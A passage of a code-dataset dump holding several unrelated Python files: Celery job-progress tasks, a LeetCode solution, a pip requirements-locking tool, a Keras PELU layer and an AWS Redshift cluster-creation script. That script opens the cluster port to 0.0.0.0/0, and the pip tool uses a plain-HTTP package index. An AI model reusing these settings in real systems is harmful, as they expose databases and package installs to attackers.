settings.issueTrackerUrl)\n \n mail.celery_send_mail([job.user.email, settings.adminEmail], subject, message)\n \n \n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_status(job_id, status):\n job = jobs.getJobById(job_id)\n job.status = status\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_stage(job_id, stage, max_value):\n job = jobs.getJobById(job_id)\n job.stage = stage\n job.progress = 0\n job.max_progress = max_value\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef set_job_progress(job_id, value, max_value):\n job = jobs.getJobById(job_id)\n job.progress = value\n job.max_progress = max_value\n job.save()\n\n@celery.task\n@upload_helpers.transaction_task\ndef increment_job_progress(job_id):\n job = jobs.getJobById(job_id)\n job.progress = job.progress+1\n job.save()\n\n","sub_path":"ptmscout_web/ptmworker/notify_tasks.py","file_name":"notify_tasks.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"593899636","text":"# http://oj.leetcode.com/problems/combination-sum-ii/\nclass Solution:\n\tdef find(self, candidates, target, a, s, i):\n\t\ttemp = s[::]\n\t\tif sum(temp) == target:\n\t\t\tif a.count(temp) == 0:\n\t\t\t\ta.append(temp)\n\t\t\treturn a\n\t\tfor j in range (i + 1, len(candidates)):\n\t\t\tif sum(temp) + candidates[j] == target:\n\t\t\t\ttemp.append(candidates[j])\n\t\t\t\tif a.count(temp) == 0:\n\t\t\t\t\ta.append(temp)\n\t\t\telif sum(temp) + candidates[j] < target:\n\t\t\t\ttemp1 = temp[::]\n\t\t\t\ttemp1.append(candidates[j])\n\t\t\t\tself.find(candidates, target, a, temp1, j)\n\t\t\telse:\n\t\t\t\tbreak\n\n\t# @param candidates, a list of integers\n\t# @param target, integer\n\t# @return a list of lists of integers\n\tdef combinationSum2(self, candidates, target):\n\t\ta = []\n\t\tcandidates.sort()\n\t\tfor i in range (0, len(candidates)):\n\t\t\ts = [candidates[i]]\n\t\t\tself.find(candidates, target, a, s, i)\n\t\treturn a\n\na = [10, 1, 2, 7, 6, 1, 5]\nt = 8\nb = [1, 1]\ns = Solution()\nprint(s.combinationSum2(a, t))\nprint(s.combinationSum2(b, 1))\n","sub_path":"combination-sum-ii.py","file_name":"combination-sum-ii.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"26981957","text":"import argparse\nfrom collections import OrderedDict\nimport logging\nimport os\nimport textwrap\n\nfrom pip.index import PackageFinder\nfrom pip.req import InstallRequirement, RequirementSet\nfrom pip.locations import build_prefix, src_prefix\n\nfrom . import settings\n\n# in this case create the 'pundler' logger, but if called again from elsewhere will give another reference to this one\nlogger = logging.getLogger('pundler')\nlogger.setLevel(logging.DEBUG)\n\n# change your formatting all from one place, or from the calling program when this gets turned into library code\nformatter = logging.Formatter(fmt = '%(message)s')\n\n#set it up to log to the console for now\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.DEBUG)\nconsole_handler.setFormatter(formatter)\nlogger.addHandler(console_handler)\n\n\ndef get_requirement_file():\n \"\"\"\n Get the \"best\" requirements file we can find\n \"\"\"\n for filename in settings.REQUIREMENTS_SOURCE_FILES:\n if os.path.exists(filename):\n return filename\n logger.warn(\n textwrap.dedent(\n \"\"\"Sorry, I couldn't find a requirements.yml or\n requirements.in!\"\"\")\n )\n\n\ndef get_requirements(filename):\n if filename is not None:\n logger.info(\"processing %s\" % filename)\n with open(filename, \"r\") as f:\n for line in f.readlines():\n line = line.strip()\n yield line\n\n\ndef install(args, lock_filename=\"requirements.txt\"):\n deps = OrderedDict()\n\n filename = get_requirement_file()\n for line in get_requirements(filename):\n line = line.strip()\n deps[line] = []\n\n requirement_set = RequirementSet(\n build_dir=build_prefix,\n src_dir=src_prefix,\n download_dir=None)\n\n requirement = InstallRequirement.from_line(line, None)\n\n requirement_set.add_requirement(requirement)\n\n install_options = []\n global_options = []\n # TODO: specify index_urls from optional requirements.yml\n finder = PackageFinder(\n find_links=[],\n index_urls=[\"http://pypi.python.org/simple/\"]\n )\n\n requirement_set.prepare_files(finder, force_root_egg_info=False, bundle=False)\n requirement_set.install(install_options, global_options)\n\n for package in requirement_set.requirements.values():\n deps[line].append(\"%s==%s\" % (package.name, package.installed_version))\n\n for package in requirement_set.successfully_installed:\n deps[line].append(\"%s==%s\" % (package.name, package.installed_version))\n\n deps[line] = set(deps[line])\n\n package_set = set([])\n\n with open(lock_filename, \"w\") as output:\n output.write(\"# this file generated from '%s' by pundler:\\n\" % (filename,))\n for requested_package in deps:\n output.write(\"# requirement '%s' depends on:\\n\" % (requested_package,))\n for dependency in deps[requested_package]:\n logger.info(\"dependency %s\" % dependency)\n if dependency not in package_set:\n dependency = dependency.lower()\n package_set.add(dependency)\n output.write(\"%s\\n\" % (dependency,))\n else:\n output.write(\"#%s\\n\" % (dependency,))\n output.write(\"\\n\")\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Manage python requirements')\n # parser.add_argument('integers', metavar='N', type=int, nargs='+',\n # help='an integer for the accumulator')\n # parser.add_argument('--sum', dest='accumulate', action='store_const',\n # const=sum, default=max,\n # help='sum the integers (default: find the max)')\n subparsers = parser.add_subparsers(title='subcommands',\n description='valid subcommands',\n help='additional help')\n install_parser = 
subparsers.add_parser('install')\n    install_parser.set_defaults(func=install)\n    return parser\n\n\ndef main():\n    args = get_parser().parse_args()\n    args.func(args)\n","sub_path":"pundler/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"84639069","text":"file = open('C:\\\\Users\\\\x1c\\\\Desktop\\\\SVNSELF\\\\Desktop\\\\SS2\\\\dome.cpp',\n            encoding=\"gbk\")\narr = []\nwhile 1:\n    line = file.readline()\n    if not line:\n        break\n    line = line.strip()\n    linevalue = (line[0:line.find(' ', 1)])\n    arr.append(linevalue)\n\n\nfilename = 'C:\\\\Users\\\\x1c\\\\Desktop\\\\SVNSELF\\\\Desktop\\\\SS2\\\\SS2-Struct.xml'\nwith open(filename,'w') as fileobject: # use 'w' to tell python to open the file in write mode\n    fileobject.write(''\n                     '\\n')\n\n\nfor i in range(0, len(arr)): \n    with open(filename,'a') as fileobject: # use 'a' to tell python to open the file in append mode\n        fileobject.write(\"\\n\t\"\n                         \"\\n\t\")\nwith open(filename,'a') as fileobject: # use 'a' to tell python to open the file in append mode\n    fileobject.write('\\n')","sub_path":"demo/xmlread (3).py","file_name":"xmlread (3).py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"582856420","text":"from .. import initializations\nfrom keras.engine import Layer\nfrom keras.utils.generic_utils import get_custom_objects\nfrom .. import backend as K\nimport numpy as np\n\n\nclass PELU(Layer):\n    \"\"\"Parametric Exponential Linear Unit.\n    It follows:\n    `f(x) = alphas * (exp(x / betas) - 1) for x < 0`,\n    `f(x) = (alphas / betas) * x for x >= 0`,\n    where `alphas` & `betas` are learned arrays with the same shape as x.\n    # Input shape\n        Arbitrary. Use the keyword argument `input_shape`\n        (tuple of integers, does not include the samples axis)\n        when using this layer as the first layer in a model.\n    # Output shape\n        Same shape as the input.\n    # Arguments\n        alphas_init: initialization function for the alpha variable weights.\n        betas_init: initialization function for the beta variable weights.\n        weights: initial weights, as a list of a single Numpy array.\n        shared_axes: the axes along which to share learnable\n            parameters for the activation function.\n            For example, if the incoming feature maps\n            are from a 2D convolution\n            with output shape `(batch, height, width, channels)`,\n            and you wish to share parameters across space\n            so that each filter only has one set of parameters,\n            set `shared_axes=[1, 2]`.\n    # References\n        - [PARAMETRIC EXPONENTIAL LINEAR UNIT FOR DEEP CONVOLUTIONAL NEURAL NETWORKS](https://arxiv.org/abs/1605.09332v3)\n    \"\"\"\n\n    def __init__(self, alphas_init='one', betas_init='one', weights=None, shared_axes=None, **kwargs):\n        self.supports_masking = True\n        self.alphas_init = initializations.get(alphas_init)\n        self.betas_init = initializations.get(betas_init)\n        self.initial_weights = weights\n        if not isinstance(shared_axes, (list, tuple)):\n            self.shared_axes = [shared_axes]\n        else:\n            self.shared_axes = list(shared_axes)\n        super(PELU, self).__init__(**kwargs)\n\n    def build(self, input_shape):\n        param_shape = list(input_shape[1:])\n        self.param_broadcast = [False] * len(param_shape)\n        if self.shared_axes[0] is not None:\n            for i in self.shared_axes:\n                param_shape[i - 1] = 1\n                self.param_broadcast[i - 1] = True\n\n        # Initialised as ones to emulate the default ELU\n        self.alphas = self.alphas_init(param_shape,\n                                       name='{}_alphas'.format(self.name))\n        self.betas = self.betas_init(param_shape,\n                                     
name='{}_betas'.format(self.name))\n\n self.trainable_weights = [self.alphas, self.betas]\n\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n\n def call(self, x, mask=None):\n if K.backend() == 'theano':\n pos = K.relu(x) * (K.pattern_broadcast(self.alphas, self.param_broadcast) /\n K.pattern_broadcast(self.betas, self.param_broadcast))\n neg = (K.pattern_broadcast(self.alphas, self.param_broadcast) *\n (K.exp((-K.relu(-x)) / K.pattern_broadcast(self.betas, self.param_broadcast)) - 1))\n else:\n pos = K.relu(x) * self.alphas / self.betas\n neg = self.alphas * (K.exp((-K.relu(-x)) / self.betas) - 1)\n return neg + pos\n\n def get_config(self):\n config = {'alphas_init': self.alphas_init.__name__,\n 'betas_init': self.betas_init.__name__}\n base_config = super(PELU, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\nget_custom_objects().update({\"PELU\": PELU})\n","sub_path":"keras_contrib/layers/advanced_activations.py","file_name":"advanced_activations.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"608816503","text":"import time\nimport boto3\nimport gblevntdata_rshift_config as db_config\n\nec2_resource = boto3.resource('ec2',\n region_name=\"us-east-1\",\n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\niam_resource = boto3.client('iam',\n region_name='us-east-1', \n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\nredshift_resource = boto3.client('redshift',\n region_name=\"us-east-1\",\n aws_access_key_id=db_config.KEY,\n aws_secret_access_key=db_config.SECRET\n )\n\n#roleArn = db_config.DWH_ARN\nroleArn = iam_resource.get_role(RoleName=db_config.DWH_IAM_ROLE_NAME)['Role']['Arn']\n\ntry:\n response = redshift_resource.create_cluster( \n #HW\n ClusterType=db_config.DWH_CLUSTER_TYPE,\n NodeType=db_config.DWH_NODE_TYPE,\n NumberOfNodes=int(db_config.DWH_NUM_NODES),\n\n #Identifiers & Credentials\n DBName=db_config.DWH_DB,\n ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER,\n MasterUsername=db_config.DWH_DB_USER,\n MasterUserPassword=db_config.DWH_DB_PASSWORD,\n \n #Roles (for s3 access)\n IamRoles=[roleArn] \n )\nexcept Exception as e:\n print(e)\n\ncluster_status = response['Cluster']['ClusterStatus']\nif cluster_status == 'creating':\n creating_cluster = True\n while creating_cluster:\n response = redshift_resource.describe_clusters(ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER)\n cluster_status = response['Clusters'][0]['ClusterStatus']\n if cluster_status == 'available':\n creating_cluster = False\n print(cluster_status)\n else:\n print(\"Waiting while cluster is... 
\",cluster_status)\n time.sleep(60)\n \n#Get cluster properties\nmyClusterProps = redshift_resource.describe_clusters(ClusterIdentifier=db_config.DWH_CLUSTER_IDENTIFIER)\n\n#Open an incoming TCP port to access the cluster endpoint\n\ntry:\n secgrp_id = myClusterProps['Clusters'][0]['VpcSecurityGroups'][0]['VpcSecurityGroupId']\n #print('secgrp_id is: ', secgrp_id)\n secgrp_value = 'ec2.SecurityGroup(id=' + \"'\" + secgrp_id + \"')\"\n #print('secgrp_value is: ', secgrp_value)\n vpc_id = myClusterProps['Clusters'][0]['VpcId']\n vpc = ec2_resource.Vpc(id=vpc_id)\n #print('vpc is: ', vpc)\n secgrp_list = list(vpc.security_groups.all())\n #print(secgrp_list)\n for secgrp_item in secgrp_list:\n if str(secgrp_item) == secgrp_value:\n defaultSg_resource = secgrp_item\n \n #vpc = ec2_resource.Vpc(id=myClusterProps['Clusters'][0]['VpcId'])\n #defaultSg_id = myClusterProps['Clusters'][0]['VpcSecurityGroups'][0]['VpcSecurityGroupId']\n #defaultSg_resource = vpc.security_groups.filter(GroupIds=[defaultSg_id])\n #defaultSg = list(vpc.security_groups.all())[0]\n #list(vpc.security_groups.all())[0]\n print(defaultSg_resource)\n defaultSg_resource.authorize_ingress(\n GroupName=defaultSg_resource.group_name,\n CidrIp='0.0.0.0/0',\n IpProtocol='TCP',\n FromPort=int(db_config.DWH_PORT),\n ToPort=int(db_config.DWH_PORT)\n )\nexcept Exception as e:\n print(e)\n\n\n\n ","sub_path":"redshift/gblevntdata_rshift_clust_create.py","file_name":"gblevntdata_rshift_clust_create.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"297576397","text":"import ast\nimport json\n\nimport requests\nfrom cachetools import TTLCache\nfrom requests import HTTPError\n\nfrom utils.constants import DEFAULT_CACHE_MODE, DEFAULT_CACHE_TTL, ZOHO_AUTH_HEADER, ZOHO_AUTH_TOKEN_HEADER_PREFIX, \\\n ZOHO_ORG_ID_HEADER, ZOHO_SUBSCRIPTION_API_URL, DEFAULT_CACHE_MAXSIZE\n\n\nclass Client:\n def __init__(self, config):\n self.auth_token = config[\"authtoken\"]\n self.zoho_org_id = config[\"zohoOrgId\"]\n try:\n self.cache_enabled = config[\"cache_enabled\"]\n except KeyError:\n self.cache_enabled = DEFAULT_CACHE_MODE\n\n try:\n self.cache_ttl = config[\"cache_ttl\"]\n except KeyError:\n self.cache_ttl = DEFAULT_CACHE_TTL\n self.requests = requests.Session()\n self.cache = TTLCache(ttl=self.cache_ttl, maxsize=DEFAULT_CACHE_MAXSIZE)\n\n def add_to_cache(self, key, value):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n pass\n else:\n self.cache[key] = value\n\n def get_from_cache(self, key):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n return None\n else:\n try:\n return self.cache[key]\n except KeyError:\n return None\n\n def delete_from_cache(self, key):\n if (self.cache_enabled is None) or (self.cache_enabled is False):\n return False\n else:\n try:\n self.cache.pop(key=key)\n return True\n except KeyError:\n return False\n # my_key = ast.literal_eval(key)\n # return self.cache.pop(key=key)\n\n def get_request_headers(self, headers):\n default_headers = {\n ZOHO_AUTH_HEADER: ZOHO_AUTH_TOKEN_HEADER_PREFIX + self.auth_token,\n ZOHO_ORG_ID_HEADER: self.zoho_org_id,\n 'Content-Type': \"application/json\"\n }\n if (headers is not None) and len(headers) > 0:\n default_headers.update(headers)\n return default_headers\n\n def send_request(self, method, uri, data=None, headers=None):\n try:\n response = requests.request(method, ZOHO_SUBSCRIPTION_API_URL + uri, data=json.dumps(data),\n 
headers=self.get_request_headers(headers))\n response.raise_for_status()\n\n except HTTPError as http_err:\n return http_err\n except Exception as err:\n return None\n if response.headers['Content-Type'] == 'application/json;charset=UTF-8':\n return json.loads(response.text)\n else:\n return response.content\n\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412091041","text":"\n\n#calss header\nclass _QUOTIENT():\n\tdef __init__(self,): \n\t\tself.name = \"QUOTIENT\"\n\t\tself.definitions = [u'a particular degree or amount of something: ', u'the result of dividing one number by another']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_quotient.py","file_name":"_quotient.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259280349","text":"from __future__ import print_function\nfrom __future__ import division\nimport sys\n\nimport numpy as np\n\nfrom ROOT import TFile, TH1, TKey\n\nfrom PlotUtils import *\n#from Cuts2018 import *\n#from Cuts2017 import *\n#from Cuts2016 import *\nfrom Cuts2012 import *\n\n\nmpl.rcParams[\"legend.fontsize\"] = \"x-large\"\n\n##\n## SAMPLE INFO\n##\n\nselection = [\"4l\"]\n\nnameTeX = {\"b_z1m\":r\"m_{\\mathrm{Z}_{1}}\", \"b_z2m\":r\"m_{\\mathrm{Z}_{2}}\",\n \"b_l1p\":r\"p_{\\ell_{1}}\", \"b_ttm\":r\"m_{\\ell_{2,3,4}}\",\n \"angle_z1l2_z2\":r\"\\beta\", \"angle_z1leps\":r\"\\alpha_{\\mathrm{Z}_{1}}\",\n \"angle_z2leps\":r\"\\alpha_{\\mathrm{Z}_{2}}\",\n \"cos_theta_z1\":r\"\\cos\\theta_{\\mathrm{Z}_{1}}\",\n \"cos_theta_z2\":r\"\\cos\\theta_{\\mathrm{Z}_{2}}\",\n \"sin_phi\":r\"\\sin\\phi\", \"sin_phi_10\":r\"\\sin\\phi\"}\n\nT = np.dtype([(sel, object) for sel in selection])\nV = np.dtype([(\"x\", 'f4'), (\"y\", 'f4'), (\"ex\", 'f4'), (\"ey\", 'f4'), (\"b\", 'f4')])\n\nyear = sys.argv[1]\nif year != YEAR_STR:\n print(\"Wrong year in header file\")\n\n\n\n##\n## UNFOLDED DATA\n##\n\nprefix = \"unfolding\"\n\nufName = prefix + \"_\" + year + \".root\"\nufFile = TFile(ufName, \"READ\")\nprint(\"Opened\", ufName)\n\nhnames = [\"b_z1m\", \"b_z2m\", \"b_ttm\", \"b_l1p\", \"cos_theta_z1\", \"cos_theta_z2\", \n \"angle_z1leps\", \"angle_z2leps\", \"angle_z1l2_z2\", \"sin_phi\", \"sin_phi_10\"]\nH = len(hnames)\n\n# Single-parameter result\ninfile = \"combination_1.npz\"\nnpzfile = np.load(infile)\n\nalpha, bf_pred = npzfile['alpha_total'], np.sum(npzfile['bf_pred'])\ndelta_syst = npzfile['delta_syst']\n\n\n# Get histograms\ndata, axe, stat = np.empty(H, dtype=T), np.empty(H, dtype=T), np.empty(H, dtype=T)\nh = 0\n\nfor hname in hnames:\n data[h]['4l'] = ufFile.Get(hname + \"/\" + hname + \"_result\")\n data[h]['4l'].SetDirectory(0)\n data[h]['4l'].SetBinErrorOpt(kPoisson)\n\n stat[h]['4l'] = ufFile.Get(hname + \"/\" + hname + \"_stat\")\n stat[h]['4l'].SetDirectory(0)\n stat[h]['4l'].SetBinErrorOpt(kPoisson)\n\n h = h + 1\nh = 0\n\nufFile.Close()\nprint(\"Got data histograms\")\nprint(\"\")\n\n\n\n##\n## ACC * EFF\n##\n\nprefix = \"migration\"\n\n# Unscaled signal events\nzzName = prefix + \"_\" + year + \"_zz_4l.root\"\nzzFile = TFile(zzName, \"READ\")\nprint(\"Opened\", zzName)\n\naxe = np.empty(H, dtype=T)\nh = 0\n\nfor hname 
in hnames:\n axe[h][sel] = zzFile.Get(sel + \"/\" + hname + \"_gen\")\n axe[h][sel].SetDirectory(0)\n axe[h][sel].SetName(hname + \"_acc_x_eff\")\n\n h = h + 1\nh = 0\n\nzzFile.Close()\n\n\n# Phase space events\nps = np.empty(H, dtype=T)\nh = 0\n\nprefix = \"4l\"\n\npsName = prefix + \"_\" + year + \"_phase_space.root\"\npsFile = TFile(psName, \"READ\")\nprint(\"Opened\", psName)\n\nsf = INT_LUMI * 1000 * XSEC['zz_4l'] / NGEN['zz_4l']\n\nfor sel in selection:\n for hname in hnames:\n ps[h][sel] = psFile.Get(sel + \"/\" + hname + \"_phase_space\")\n ps[h][sel].SetDirectory(0)\n ps[h][sel].Scale(sf)\n\n h = h + 1\n h = 0\n\npsFile.Close()\n\nprint(\"Got acc * eff histograms\")\nprint(\"\")\n\n\n\n##\n## SCALING\n##\n\nscale = alpha * bf_pred * GAMMA_Z\n\nfor sel in [\"4l\"]:\n for h in range(H):\n axe[h][sel].Divide(ps[h][sel])\n\n for sample in [data, stat]:\n sample[h][sel].Divide(axe[h][sel])\n sample[h][sel].Scale(scale / sample[h][sel].Integral())\n\n ps[h][sel].Scale(scale / ps[h][sel].Integral())\n\n\n# Systemtatic uncertainty\nfor sel in [\"4l\"]:\n for h in range(H):\n\n # Add total systematic\n for i in range(data[h][sel].GetNbinsX()):\n data[h][sel].SetBinError(i + 1,\n np.sqrt((data[h][sel].GetBinContent(i + 1) * delta_syst) ** 2\n + data[h][sel].GetBinError(i + 1) ** 2))\n\n # Get rid of the prediction uncertainty\n for i in range(ps[h][sel].GetNbinsX()):\n ps[h][sel].SetBinError(i+1, 0)\n\n\n# Get ratio\nratio, ratio_stat = np.empty(H, dtype=T), np.empty(H, dtype=T)\n\nfor sel in [\"4l\"]:\n for h in range(H):\n ratio_stat[h][sel] = stat[h][sel].Clone()\n ratio_stat[h][sel].Divide(ps[h][sel])\n\n ratio[h][sel] = data[h][sel].Clone()\n ratio[h][sel].Divide(ps[h][sel])\n\n\n\n\n\n####\n####\n#### LOOP OVER DISTS\n####\n####\n\n\nfor sel in [\"4l\"]:\n lumi = '%.1f' % INT_LUMI\n sqrt_s = '%i' % SQRT_S\n\n\n print(\"Drawing\", sel, \"plots...\")\n\n for h in range(H):\n\n ##\n ## GET BIN CONTENT\n ##\n\n # Data\n v_data = np.zeros(data[h][sel].GetNbinsX(), dtype=V)\n v_stat = np.zeros(data[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_data)):\n v_data[i]['x'] = data[h][sel].GetBinCenter(i+1)\n v_data[i]['y'] = data[h][sel].GetBinContent(i+1)\n v_data[i]['ey'] = data[h][sel].GetBinError(i+1)\n v_stat[i]['ey'] = stat[h][sel].GetBinError(i+1)\n\n # MC\n v_pred = np.zeros(ps[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_pred)):\n v_pred[i]['x'] = ps[h][sel].GetBinLowEdge(i+1)\n v_pred[i]['y'] = ps[h][sel].GetBinContent(i+1)\n v_pred[i]['ey'] = ps[h][sel].GetBinContent(i+1)\n\n # Ratio\n v_ratio = np.zeros(ratio[h][sel].GetNbinsX(), dtype=V)\n v_ratio_stat = np.zeros(ratio[h][sel].GetNbinsX(), dtype=V)\n for i in range(len(v_ratio)):\n v_ratio[i]['x'] = ratio[h][sel].GetBinCenter(i+1)\n v_ratio[i]['ex'] = ratio[h][sel].GetBinWidth(i+1) / 2\n v_ratio[i]['y'] = ratio[h][sel].GetBinContent(i+1)\n v_ratio[i]['ey'] = ratio[h][sel].GetBinError(i+1)\n v_ratio_stat[i]['ey'] = ratio_stat[h][sel].GetBinError(i+1)\n\n\n\n ##\n ## MAKE PLOTS\n ##\n\n width = data[h][sel].GetBinWidth(1)\n\n fig, (ax_top, ax_bot) = plt.subplots(2, sharex = True, gridspec_kw = lRatioGridSpec)\n fig.subplots_adjust(left = lLeftMargin, right = lRightMargin, bottom = lBottomMargin,\n top = lTopMargin, hspace = lHorizSpace\n )\n\n # Top plots\n p_pred = ax_top.errorbar( v_data['x'], v_pred['y'], xerr = v_ratio['ex'], \n linewidth = 0, ecolor = lBlue,\n fmt = 'None', capsize = lCapSize,\n elinewidth = 2 * lErrorLineWidth4l\n )\n ax_top.errorbar( v_data['x'], v_data['y'], yerr = v_data['ey'],\n linewidth = 0, 
ecolor = '#C0C0C0', elinewidth = 4 * lErrorLineWidth4l,\n marker = None, capsize = 0\n )\n p_data = ax_top.errorbar( v_data['x'], v_data['y'], yerr = v_stat['ey'], \n linewidth = 0, ecolor = lMarkerColor, elinewidth = lErrorLineWidth4l,\n marker = 'o', capsize = lCapSize, markersize = lMarkerSize2l,\n markeredgecolor = lMarkerColor, markerfacecolor = lMarkerColor\n )\n\n top_min, top_max = ax_top.get_ylim()\n\n if hnames[h] in [\"b_ttm\", \"angle_z1l2_z2\", \"sin_phi\"]:\n top_max = 3.5\n elif hnames[h] == \"b_l1p\":\n top_max = 5.5\n elif hnames[h] in [\"b_z1m\", \"sin_phi_10\"]:\n top_max = 5\n elif hnames[h] == \"b_z2m\":\n top_max = 10\n elif hnames[h] == \"angle_z1leps\":\n top_max = 8\n elif hnames[h] in [\"angle_z2leps\", \"cos_theta_z1\"]:\n top_max = 4\n elif hnames[h] in [\"cos_theta_z2\"]:\n top_max = 3\n\n ax_top.set_ylim(0, top_max)\n\n\n # Ratio plot\n\n ax_bot.set_ylim(lRatioMin4l, lRatioMax4l)\n\n ax_bot.axhline(lRatioMid, color = lBlue, linewidth = 2 * lErrorLineWidth4l)\n ax_bot.errorbar(v_ratio['x'], v_ratio['y'], yerr = v_ratio['ey'],\n linewidth = 0, ecolor = '#C0C0C0', elinewidth = 4 * lErrorLineWidth4l,\n marker = None, capsize = 0\n )\n ax_bot.errorbar(v_ratio['x'], v_ratio['y'], yerr = v_ratio_stat['ey'],\n linewidth = 0, ecolor = lMarkerColor, elinewidth = lErrorLineWidth4l,\n marker = 'o', capsize = lCapSize, markersize = lMarkerSize2l,\n markeredgecolor = lMarkerColor, markerfacecolor = lMarkerColor\n )\n\n\n\n ##\n ## LABELS\n ##\n\n # Titles\n ax_top.text(0.025, 0.95, \"CMS\",\n size = \"xx-large\", weight = \"bold\",\n verticalalignment = 'top', transform = ax_top.transAxes, usetex = False)\n ax_top.text(0.025, 0.875, \"Work in Progress\",\n size = \"x-large\", style = \"italic\",\n verticalalignment = 'top', transform = ax_top.transAxes, usetex = False)\n ax_top.set_title(r'\\Large{' + lumi + r'\\,fb$^{-1}$ (' + sqrt_s + r'\\,TeV, ' + YEAR_STR + ')}',\n loc='right')\n\n # Shared x axis\n if hnames[h] in [\"b_l1p\", \"b_ttm\", \"b_z1m\", \"b_z2m\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$ (GeV)\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/$GeV)\"\n elif hnames[h] in [\"angle_z1leps\", \"angle_z2leps\", \"angle_z1l2_z2\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$ ($\\pi$ rad)\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/\\pi$ rad)\"\n elif hnames[h] in [\"cos_theta_z1\", \"cos_theta_z2\", \"sin_phi\", \"sin_phi_10\"]:\n xtitle = \"$\" + nameTeX[hnames[h]] + \"$\"\n ytitle = r\"$d\\Gamma/d\" + nameTeX[hnames[h]] + r\"$ (keV$/$unit)\"\n\n ax_bot.set_xlabel(xtitle, horizontalalignment='right')\n ax_bot.xaxis.set_label_coords(1, -0.3)\n\n # Top y axis\n ax_top.set_ylabel(ytitle, horizontalalignment='right')\n if hnames[h] in [\"b_ttm\", \"b_l1p\", \"angle_z1leps\", \"angle_z2leps\", \"cos_theta_z1\",\n \"cos_theta_z2\", \"b_z1m\", \"b_z2m\"]: \n ax_top.yaxis.set_label_coords(-0.065, 1)\n else:\n ax_top.yaxis.set_label_coords(-0.08, 1)\n ax_top.minorticks_on()\n\n # Bottom y axis\n ax_bot.set_ylabel(r'Data$/$MC')\n ax_bot.yaxis.set_label_coords(-0.08, 0.5)\n\n \n\n ##\n ## TICKS\n ##\n\n # x axes\n plt.xlim(v_pred['x'][0], v_pred['x'][-1] + width)\n\n major_step, minor_step = 2 * width, width\n if sel == \"4e\":\n major_step = width\n\n for ax in [ax_bot.xaxis, ax_top.xaxis]:\n ax.set_ticks( np.arange(\n v_pred['x'][0],\n v_pred['x'][-1] + major_step,\n step = major_step)\n )\n ax.set_ticks( np.arange(\n v_pred['x'][0],\n v_pred['x'][-1] + minor_step,\n step = minor_step),\n minor = True)\n\n # Top y axis\n# 
ax_top.ticklabel_format(axis = 'y', style = 'sci')\n# ax_top.yaxis.get_major_formatter().set_powerlimits((0, 1))\n\n # Bottom y axis\n ax_bot.yaxis.set_ticks( np.arange(lRatioMin4l+0.5, lRatioMax4l, step = 0.5) )\n\n\n\n ##\n ## LEGEND\n ##\n\n if hnames[h] in [\"angle_z1leps\", \"b_l1p\"]:\n leg_loc = 'center left'\n# elif hnames[h] in [\"cos_theta_z1\", \"cos_theta_z2\"]:\n# leg_loc = 'upper center'\n else:\n leg_loc = 'upper right'\n\n if year == \"2017\" and hnames[h] == \"zzm\" and sel == \"4e\":\n leg_loc = 'upper right'\n\n ax_top.legend(\n ( p_data, p_pred, ),\n ( 'Measured', 'POWHEG',\n ),\n loc = leg_loc, numpoints = 1, frameon = False)\n\n fig.savefig(year + \"_\" + hnames[h] + \"_ddr.pdf\")\n plt.clf()\n","sub_path":"python/DiffDists.py","file_name":"DiffDists.py","file_ext":"py","file_size_in_byte":11756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130500291","text":"\n\nfrom xai.brain.wordbase.nouns._dill import _DILL\n\n#calss header\nclass _DILLS(_DILL, ):\n\tdef __init__(self,): \n\t\t_DILL.__init__(self)\n\t\tself.name = \"DILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"dill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_dills.py","file_name":"_dills.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"124207434","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 19 15:34:15 2018\n\n@author: 